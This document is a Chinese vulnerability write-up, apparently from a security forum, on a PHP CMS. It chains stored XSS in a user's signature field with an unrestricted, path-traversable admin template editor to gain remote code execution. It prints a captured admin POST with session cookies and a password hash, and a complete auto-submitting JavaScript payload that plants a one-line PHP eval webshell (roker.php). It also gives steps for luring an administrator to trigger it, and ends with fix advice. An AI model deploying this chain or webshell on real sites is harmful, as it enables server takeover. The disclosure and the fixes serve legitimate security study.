这个 CMS 以前 90 有人发过一个 getshell，当时是后台验证文件的问题。
官网已经修补了，所以重新下了源码。
因为后台登录还需要认证码，所以注入就没看了。（注意：下面 user/do.php 的 UPDATE 同样是字符串拼接，且在普通用户登录态下就能触发；若上游没有转义，这里的注入与后台验证码无关。）
存在存储型 XSS。
漏洞文件：user/member/skin_edit.php（输出点）
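<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php
// Output-encode the stored signature before echoing it. The original line was
// `<?php echo $cscms_qianm?>`, i.e. the raw value from the database: a signature
// containing "</textarea><script>...</script>" closes the textarea and runs in the
// browser of whoever views the page (stored XSS; the value is written unfiltered by
// user/do.php). ENT_QUOTES also escapes quotes so the value cannot break out of an
// attribute if this template is reused. UTF-8 is assumed as the page charset — TODO
// confirm against the CMS's configured encoding.
echo htmlspecialchars($cscms_qianm, ENT_QUOTES, 'UTF-8');
?></textarea></td></tr>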
user/do.php（入库点）
if($op=='zl'){ // profile ("资料") update branch
	// Only rejects empty QQ / nickname / city / email. Nothing in this branch validates
	// or escapes the *content* of any field, and CS_Qianm (signature) and CS_Sex are not
	// checked at all.
	if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
	exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
	// The UPDATE is assembled by string concatenation. CS_Qianm is stored verbatim, so
	// any HTML/JS placed in the signature lands in the database as-is and is later echoed
	// by skin_edit.php (stored XSS). Every value — including CS_Sex, which is interpolated
	// without quotes — goes straight into SQL; unless an earlier layer escapes these
	// variables (not visible in this file — TODO confirm), this is also SQL injection.
	// The proper fix is a prepared statement; the $db wrapper's API is not shown here.
	$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
	CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
	where CS_Name='".$cscms_name."'";
	if($db->query($sql)){
		exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
	}else{
		exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
	}
}
没有过滤导致 XSS 产生（入库时不过滤，skin_edit.php 输出时也不编码）。

后台看了下，很奇葩的是模板编辑可以写任意格式的文件（文件名后缀没有限制）。

抓包：
POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 127.0.0.1
Content-Length: 38
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594

name=aaa.php&content=%3Cs%3E%3Ca%25%3E
注意：这个请求只靠 Cookie 鉴权，请求体里没有任何 CSRF token；`path` 参数带 `../../` 目录穿越，`name` 参数的后缀也没有限制（上例直接写入 aaa.php）；Cookie 里还直接带着 CS_AdminPassWord 的散列值。因为缺少 token，这个请求本身也能从第三方站点伪造；而下文走的是同源的存储型 XSS，脚本在后台同源执行，即使有 token 也能被读取，所以根因仍是输出不编码、后缀不限制和 path 不规范化。

于是构造 JS 如下：
<script>
// The target host is read from the page the payload runs in: the XSS fires on the
// CMS's own origin, so this aims the request at the same site the victim is logged in to.
// Note `thisTHost` is an implicit global (no `var`).
thisTHost = top.location.hostname;

// Admin template-editor endpoint (same URL as the captured request above); `path`
// traverses to skins/index/html/. The scheme is hard-coded to http.
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";

// Builds a hidden POST form and auto-submits it. The browser attaches the victim's
// admin cookies; the captured request above carries no CSRF token, and since this runs
// same-origin a token could be read by the script anyway.
//   url  - endpoint to post to
//   data - value of the `name` field (the file name to write)
//   msg  - value of the `content` field (the file body)
function PostSubmit(url, data, msg) {
    var postUrl = url;
    var postData = data;
    var msgData = msg;
    var ExportForm = document.createElement("FORM");
    document.body.appendChild(ExportForm);
    ExportForm.method = "POST";
    var newElement = document.createElement("input");
    newElement.setAttribute("name", "name");
    newElement.setAttribute("type", "hidden");
    var newElement2 = document.createElement("input");
    newElement2.setAttribute("name", "content");
    newElement2.setAttribute("type", "hidden");
    ExportForm.appendChild(newElement);
    ExportForm.appendChild(newElement2);
    newElement.value = postData;
    newElement2.value = msgData;
    ExportForm.action = postUrl;
    ExportForm.submit();
};
// Writes roker.php (a one-line PHP eval backdoor) into the target directory. Per the
// author's aaa.php test above, the server does not restrict the file extension.
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
</script>

在 http://127.0.0.1/user/space.php?ac=edit&op=zl 的修改签名处插入上面的脚本（对应 do.php 中 op=zl 分支写入的 CS_Qianm 字段）。

用你的账号给管理员发个私信，或者让他访问你的主页 http://127.0.0.1/home/?uid=2（uid 自己改）。只要管理员带着后台登录态打开渲染了签名的页面，脚本就会以他的身份发出上面的 POST。

随后就会在 skins\index\html\ 目录下生成一句话木马 roker.php。修复建议：签名输出时做 htmlspecialchars 编码；后台模板写入限制后缀白名单、对 path 做规范化并禁止 `..`；管理后台表单加 CSRF token。